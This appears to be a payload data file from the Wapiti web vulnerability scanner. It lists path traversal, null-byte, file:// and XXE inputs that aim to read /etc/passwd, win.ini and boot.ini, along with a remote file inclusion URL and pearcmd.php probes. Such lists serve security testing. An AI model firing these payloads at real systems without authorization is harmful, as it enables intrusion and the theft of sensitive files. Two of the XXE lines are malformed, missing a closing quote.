http://wapiti3.ovh/e.php
/etc/passwd
/etc/passwd\0
/etc/services
/etc/services\0
c:\\boot.ini
c:\\boot.ini\0
c:\\windows\win.ini
c:\\windows\win.ini\0
c:/windows/win.ini
c:/windows/win.ini\0
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd\0
../../../../../../../../../../../../../../../../../../../../etc/passwd\0
../../../../../../../../../../etc/services
../../../../../../../../../../../../../../../../../../../../etc/services
../../../../../../../../../../etc/services\0
../../../../../../../../../../../../../../../../../../../../etc/services\0
../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini\0
../../../../../../../../../../../../../../../../../../../../boot.ini\0
../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../windows/win.ini\0
../../../../../../../../../../../../../../../../../../../../windows/win.ini\0
[VALUE]/../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../etc/services
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
[VALUE]/../../../../../../../../../../etc/services\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
[VALUE]/../../../../../../../../../../windows/win.ini
[VALUE]/../../../../../../../../../../../../../../../../../../../../windows/win.ini
[VALUE]/../../../../../../../../../../windows/win.ini\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../windows/win.ini\0
[DIRVALUE]/../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../etc/services
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
[DIRVALUE]/../../../../../../../../../../etc/services\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
[DIRVALUE]/../../../../../../../../../../windows/win.ini
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../windows/win.ini
[DIRVALUE]/../../../../../../../../../../windows/win.ini\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../windows/win.ini\0
file:///etc/passwd
file://c:\\boot.ini
file://c:\\windows\win.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd\0
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services\0
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini\0
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//windows/win.ini\0
/etc/passwd\0index.htm
/etc/passwd\0index.html
/etc/passwd\0index.php
/etc/passwd\0index.asp
/etc/passwd\0index.aspx
/etc/passwd\0index.css
c:\\windows\win.ini\0index.htm
c:\\windows\win.ini\0index.html
c:\\windows\win.ini\0index.php
c:\\windows\win.ini\0index.asp
c:\\windows\win.ini\0index.aspx
c:\\windows\win.ini\0index.css
../../../../../../../../../../etc/passwd\0index.htm
../../../../../../../../../../etc/passwd\0index.html
../../../../../../../../../../etc/passwd\0index.php
../../../../../../../../../../etc/passwd\0index.asp
../../../../../../../../../../etc/passwd\0index.aspx
../../../../../../../../../../etc/passwd\0index.css
../../../../../../../../../../etc/passwd\0pix.gif
../../../../../../../../../../windows\win.ini\0index.htm
../../../../../../../../../../windows\win.ini\0index.html
../../../../../../../../../../windows\win.ini\0index.php
../../../../../../../../../../windows\win.ini\0index.asp
../../../../../../../../../../windows\win.ini\0index.aspx
../../../../../../../../../../windows\win.ini\0index.css
../../../../../../../../../../windows\win.ini\0pix.gix
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini>]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini>]><foo>&xxe;</foo>
.depdb
.depdb\0
pearcmd.php
pearcmd.php\0
[FILE_NAME]
[FILE_NAME]\0
